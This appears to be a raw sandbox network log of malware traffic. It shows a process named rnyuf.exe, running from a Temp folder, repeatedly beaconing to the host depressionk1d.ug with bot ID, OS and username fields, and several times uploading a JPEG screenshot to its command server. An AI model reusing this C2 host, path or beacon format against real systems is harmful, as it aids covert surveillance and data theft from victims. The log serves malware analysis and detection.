                          Nov 12, 2021 22:24:54.126594067 CET17837OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:54.167454004 CET17838INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:54 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          373192.168.2.450223178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:54.300174952 CET17838OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:54.328485966 CET17839INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:54 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          374192.168.2.450224178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:54.468602896 CET17839OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:55.527674913 CET17848INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:55 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:24:55.538786888 CET17848OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:55.538861990 CET17849OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:55.539056063 CET17859OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:55.539134026 CET17861OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:55.561889887 CET17867OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:55.561954975 CET17886OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:55.562478065 CET17888OUTData Raw: 97 a3 cb 25 9f 95 a6 eb da 83 6a 2a d3 db 5a d9 48 86 68 ad d5 8a 6f 7c 44 db 98 95 63 b4 05 00 01 96 39 c8 ca d3 7c 49 a8 e9 10 df 18 59 e6 bc bd b9 86 e2 4b 99 9f 7e fd 82 40 ca e0 83 bc 38 90 83 93 d3 3d 73 57 a0 f1 3e 9d 15 f6 9f 70 de 1f 9c
                          Data Ascii: %j*ZHho|Dc9|IYK~@8=sW>p*_3OXo<F9b1$<V_#_5vE:59[p-fh8QqtAipD+7LgVQo4ZG*EqG|&Z3<#+F2]"
                          Nov 12, 2021 22:24:55.584547043 CET17897OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:24:55.584609032 CET17916OUTData Raw: 47 59 00 45 4d e8 a4 38 23 09 8c a9 f9 54 1e 32 ad 52 71 95 a3 fd 7f 4b fa d4 d2 95 38 c9 5d ff 00 5f d7 f5 b1 49 3c 31 2c 97 13 03 a9 e9 e9 67 1d 9f db 45 f1 69 4c 2f 16 f0 87 1b 50 be 43 36 08 2a 08 c1 cd 36 4f 09 ea 6b 2d c4 70 18 2e 9a 29 2d
                          Data Ascii: GYEM8#T2RqK8]_I<1,gEiL/PC6*6Ok-p.)-<'<l~!4e$-FB$;TpJ\{CRh0qhn*5-wm3Zyiulndf!Y{7M=
                          Nov 12, 2021 22:24:55.584644079 CET17921OUTData Raw: 2b c0 6b dd be 03 de 5a da 78 7f 56 fb 4d cc 30 ee ba 5d be 6c 81 73 84 e7 19 ac 2b fc 06 b4 7e 23 9f ff 00 84 73 5c ff 00 a0 2e a3 ff 00 80 af fe 14 a3 c3 ba ea b0 61 a3 ea 40 83 90 45 ab f1 fa 57 bb ff 00 6c 69 9f f4 12 b3 ff 00 c0 84 ff 00 1a
                          Data Ascii: +kZxVM0]ls+~#s\.a@EWliO/v_]U?Y'Wwe)IdePLmZ5EU?AK/O>2eT6u<KSjV:wwje;j@S%-4&wN5X%WxP2
                          Nov 12, 2021 22:24:55.584657907 CET17923OUTData Raw: 6a 64 f3 0c c5 2e 2a 50 86 94 25 04 f3 11 81 4f 02 9e 14 53 c0 5a 64 b9 11 85 a7 84 a7 82 a3 bd 1e 6a 0f e2 14 10 db 62 04 a7 04 a6 9b 98 87 f1 52 7d b6 31 d3 9a 77 42 e5 9b e8 4c 12 94 25 56 37 cb d8 53 7e da 4f 41 45 c3 d9 cc bd b7 14 a0 56 7f
                          Data Ascii: jd.*P%OSZdjbR}1wBL%V7S~OAEVD+RQVW1=w}ExURQa{"h[sFM7w9J~7xqBhh$\kc%5X5.w/YsFr-IM}b]\G
                          Nov 12, 2021 22:24:55.679779053 CET17958INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:55 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          375192.168.2.450226178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:55.674156904 CET17958OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:55.943295956 CET17958INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:55 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          376192.168.2.450227178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:56.080647945 CET17959OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:56.139010906 CET17959INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:56 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          377192.168.2.450228178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:56.267755032 CET17960OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:56.318522930 CET17960INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:56 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          378192.168.2.450229178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:56.460182905 CET17961OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:56.496539116 CET17962INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:56 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          379192.168.2.450230178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:56.625072002 CET17962OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:56.667696953 CET17963INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:56 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:24:56.698250055 CET17963OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:56.698446035 CET17963OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:56.698704004 CET17973OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:56.698847055 CET17976OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:56.721332073 CET17981OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:56.721375942 CET17987OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:56.721430063 CET17992OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:56.721450090 CET17997OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:24:56.721487999 CET18003OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:24:56.744415045 CET18008OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:24:56.744482040 CET18019OUTData Raw: f2 17 b7 ff 00 7a 9f aa 1f f8 9a 5c 7f be 6a 3d 1b fe 42 f6 ff 00 ef 53 b5 13 9d 46 7f f7 cd 72 5b f7 ff 00 23 59 7f 07 e6 56 a4 ef 45 15 b9 ca 2d 14 94 b4 00 52 d2 52 f6 a0 40 29 69 29 69 08 29 45 25 28 a0 41 40 a2 81 48 07 03 4a 29 29 45 21 31
                          Data Ascii: z\j=BSFr[#YVE-RR@)i)i)E%(A@HJ))E!1)"Wm$*PvxEz^^<CW6_9z1z=x'KtVNkQ<i/Vk~B4WIqNQZVCZxsPNE&LsR@)i)"5Tp5
                          Nov 12, 2021 22:24:56.793869972 CET18070INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:56 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          38192.168.2.449822178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:30.948812008 CET4120OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:30.975341082 CET4120INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:30 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          380192.168.2.450231178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:56.797413111 CET18071OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:56.828036070 CET18071INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:56 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          381192.168.2.450232178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:56.983191013 CET18072OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:57.020462990 CET18072INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:57 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
